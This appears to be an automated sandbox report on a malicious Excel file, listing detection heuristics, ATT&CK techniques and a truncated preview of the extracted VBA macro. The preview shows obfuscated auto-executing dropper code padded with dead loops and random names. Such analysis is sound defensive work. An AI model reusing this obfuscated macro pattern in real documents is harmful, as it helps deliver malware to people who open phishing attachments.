MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is an Excel document containing VBA macros, specifically a Workbook_Open event. This event triggers obfuscated VBA code that utilizes Shell() and CreateObject calls, strongly indicating an attempt to download and execute a secondary payload. The presence of a long encoded blob and the nature of the VBA code suggest a downloader or droppper functionality.
Heuristics 6
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15716 bytes |
SHA-256: b3b2e5e4aae5869f688a4e48171b50b385b9e344755d5d913be1d2712493cd96 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 5 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
kpJe3.P4wOFRH6CjNRPZS_PCdX
While 3 = 7485
Dim pH6B_u_qaWbXbtstqzVps5TqgnZ6__J1Nw3F7 As Variant
Wend
Dim uIURZcoFyy As Integer
While 13 = 3659
Dim fqhRYowouwNcZSDqVLkHozkw5p_VQZoiry3NZvtJa As Variant
Wend
Dim GGSrPsANsFaeo As Integer
While 18 = 1607
Dim Ip_uVsnYVSFntkZyOjaYqfqQDm79GhSMDCnLHoXAeAuwKDfFjYbf9_7l8w As Variant
Wend
Dim psvoQx_3jq6L As Integer
While 1 = 3859
Dim oiJZ4pu4__FyWr_vM8EANU9oNyr7wRcyIWs3ThJO1Drpk6QirLokj47Sj As Variant
Wend
Dim eKD7xEueQn_8KZn As Integer
While 12 = 1368
Dim wyHJlRCQgHMim1MNYYRyVERC76ISPPjfv_xutvpPb As Variant
Wend
Dim exifGnCXig2 As Integer
While 11 = 8159
Dim kQpfELpGrAOgqwlCadlrAUcidcZweP2pBmIrFNnh_Hs2OO2sekk47 As Variant
Wend
Dim x1OwEBlv2la As Integer
While 15 = 3448
Dim GhdCm45LyDr2kkSMjpQ3o7sLv34ALBuGeQspty_joW_3E As Variant
Wend
Dim mKvwA_irvJyP As Integer
While 21 = 4255
Dim Ps_49vQjVS2mcukpMP2zFwOqMYAogvehzbhUjuX As Variant
Wend
Dim QjekSSGRNc2d As Integer
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "kpJe3"
Dim jWAx9Phjjjw8KOQ93yCWNIWShYdwQdO46f_P4O9k_To2633f6WcfWLJY_qOiutR_S3AoO__myZV3ddVne713A As String
Function dQ8IbcQoiukBiwRvALNEa1iNkJ5V_EuKnP_O2Q_2QEyf9bBe_(wpALw_ESfyQr82lsd29TSYGYJg8yw7M_NvsEim5CUebIMso3WPnKSVIWhkBOEOfijPbKHeI1769x67JZ1DZfQBo2kTg7jo6_93h6Obt2EwMWWUZjY)
While 28 = 2736
Dim vv_rllds93HK8MUCqqPsFQE2U8uW7Wr3JhmOnqSiWaGweGBtvb As Variant
Wend
Dim jjYbfcoFUn As Integer
While 8 = 9721
Dim zFvkIO_XjEX9VqToIRVL5AjdvFcqAI As Variant
Wend
Dim ifUnrPnfmOGmI As Integer
While 4 = 8385
Dim oCjMqG1RVtGsyeQxBvRVZe1mq8D_ln As Variant
Wend
Dim F_P15ZK3uiIzLvM As Integer
Dim KYTdobdnLx71_z6GmGmoOXXTTkGvIYG6mLuzwERT7PfvjzrGay__ebnv__HDSqd
While 6 = 8430
Dim tVrjcyOrHK7esCzoqlBa8j1kH_rKjR_Yv_Sm4DmOAGuNNW As Variant
Wend
Dim BeSIdHJc5HeEZb As Integer
While 5 = 9392
Dim ECGzFfsmsLum9vZzykVu8L2Yw5NQHI As Variant
Wend
Dim GwlII794GqnWvF As Integer
While 7 = 6707
Dim W1HWC_S3sod3IqBJQZdiD7_ylbz4cnEiYuB6u As Variant
Wend
Dim zNDyMD7oPvP26 As Integer
Dim h6PWagDbKv9LecKJousWE6pWFzO6GtgZK5wW5hqDNQrXH9XGs9rlV1wkO2PkPFTaNh_jowOFDnGxLPNFaGKGA4CTGJGCQEwG7PHj8wa6skhrs9X8mHIH
While 7 = 1915
Dim YL3LBZ1SuiMXYDh4bXoEYZJYsz3CHTpiBfN3pLskDZ As Variant
Wend
Dim ozYx9WtxWjuf8 As Integer
While 14 = 6942
Dim BbbJfxIY3mV2yoMNnDA8UeiRA3nXfQ9P_PzMshDOPnvKC6I As Variant
Wend
Dim qfhseshke2IHl As Integer
While 23 = 6111
Dim Hu3jnE1gx9eE_uqqrVO_s718hbfanTTiXZFdtKg7 As Variant
Wend
Dim Dk2fBle8z3 As Integer
While 1 = 7443
Dim vd3D3J44AJiY3cn5pinK6fyQAGDS567gju As Variant
Wend
Dim gyoTg5jzIVWmrW2 As Integer
While 2 = 6087
Dim E65Sn7OokBtEi9_LAyF6yOUArkEVb4VYoax9AM6w As Variant
Wend
Dim QIDQvxAz_HU As Integer
While 19 = 2565
Dim xjaBzi4jBz2LpoSZFI_Jw3RnoKCM4jNPRggyMX8YFl3 As Variant
Wend
Dim X6VlbW3p_8h5P As Integer
Set h6PWagDbKv9LecKJousWE6pWFzO6GtgZK5wW5hqDNQrXH9XGs9rlV1wkO2PkPFTaNh_jowOFDnGxLPNFaGK
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.